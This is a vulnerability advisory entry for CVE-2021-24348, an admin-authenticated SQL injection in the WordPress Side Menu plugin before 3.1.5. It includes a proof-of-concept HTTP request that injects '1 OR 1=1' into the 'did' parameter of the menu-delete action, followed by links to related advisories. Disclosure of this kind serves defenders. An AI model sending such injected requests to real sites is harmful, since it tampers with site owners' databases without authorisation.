Lucene search
WpvulndbWPEX-ID:E0CA257E-6E78-4611-A9AD-BE43D37CF474HistoryMay 27, 2021 - 12:00 a.m.
Side Menu < 3.1.5 - Authenticated (admin+) SQL Injection
2021-05-2700:00:00
wpvulndb
120
side menu
authenticated
sql injection
admin+
EPSS
0.001
Percentile
44.7%
The menu delete functionality of the plugin, available to Administrator users takes the did GET parameter and uses it into an SQL statement without proper sanitisation, validation or escaping, therefore leading to a SQL Injection issue
GET /wp-admin/admin.php?page=side-menu&info=del&did=1%20OR%201=1 HTTP/1.1
Host: 172.28.128.50
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.28.128.50/wp-admin/admin.php?page=side-menu&info=saved
Accept-Language: en-US,en;q=0.9
Cookie: [admin+]
Connection: closeRelated
patchstack
patchstack
cvelist
cvelist
CVE-2021-24348 Side Menu < 3.1.5 - Authenticated (admin+) SQL Injection
2021-06-14 13:37:12
cnvd
cnvd
WordPress side buttons plugin SQL injection vulnerability
2021-06-15 00:00:00
nvd
nvd
CVE-2021-24348
2021-06-14 14:15:08
wpvulndb
wpvulndb
Side Menu < 3.1.5 - Authenticated (admin+) SQL Injection
2021-05-27 00:00:00
prion
prion
Sql injection
2021-06-14 14:15:00
cve
cve
CVE-2021-24348
2021-06-14 14:15:08